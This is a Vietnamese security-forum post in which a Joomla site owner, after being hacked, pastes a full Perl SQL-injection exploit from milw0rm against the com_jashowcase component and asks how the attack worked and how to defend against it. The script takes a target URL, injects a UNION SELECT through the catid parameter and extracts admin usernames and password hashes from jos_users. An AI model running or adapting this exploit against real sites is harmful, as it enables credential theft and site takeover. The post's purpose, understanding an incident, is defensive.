banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Cho hỏi cách Ja_showcase bị tấn công  XML
  [Question]   Cho hỏi cách Ja_showcase bị tấn công 05/05/2010 07:38:16 (+0700) | #1 | 210330
[Avatar]
tranduyninh
Member

[Minus]    0    [Plus]
Joined: 05/07/2006 12:05:48
Messages: 253
Location: aiowebs.net
Offline
[Profile] [PM] [WWW] [Yahoo!]
Em đang có 1 website sử dụng joomla , dùng component Ja_showcase ... cái com này cũng cũ quá rồi, hôm qua website bị hack , nghĩ ngay đến thằng này , vào Milw0m search ra cái này ,


Code:
#!/usr/bin/perl -w

#Joomla com_jashowcase Sql injection#
########################################
#[~] Author : EcHoLL
#[~] www.warezturk.org www.tahribat.com
#[~] Greetz : Black_label TURK Godlike Nitrous
#[!] Module_Name: com_jashowcase
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"com_jashowcase"
########################################

system("color FF0000");
system("Nohacking");
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t| Turkish Securtiy Team |\n\n";
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t|Joomla Module com_jashowcase(section&id=)Remote SQL Injection Vuln|\n\n";
print "\t\t| Coded by: EcHoLL www.warezturk.org |\n\n";
print "\t\t-------------------------------------------------------------\n\n";
use LWP::UserAgent;
print "\nSite ismi Target page:[http://wwww.site.com/path/]: ";
chomp(my $target=<STDIN>);
$column_name="concat(username,0x3a,password)";
$table_name="jos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=com_jashowcase&view=jashowcase&Itemid=109&catid=34+AND+1=2+UNION+SELECT+0,1,".$column_name.",3,4,5,6,7,8,9,10,11,12+from/**/".$table_name."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Tebrikler Exploit Calisti! #\n\n";
}
else{print "\n[-] Exploit Bulunamadı...\n";
}

# milw0rm.com [2009-01-11]


Không hiểu hacker đã tấn công như thế nào để lấy quyền admin và up shell lên host , cách phòng chống ra sao ? mong được mọi người quan tâm ...
Ngoài ra website cũng có 1 forum = PHPbb .... giờ em xoá forum luôn rồi
Các bạn giúp mình giải cứu bạn gái này nha : http://bit.ly/23mHJE ( đây là 1 cuộc thi đó ) không biêt các hắc cơ có ý kiến như thế nào ?
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|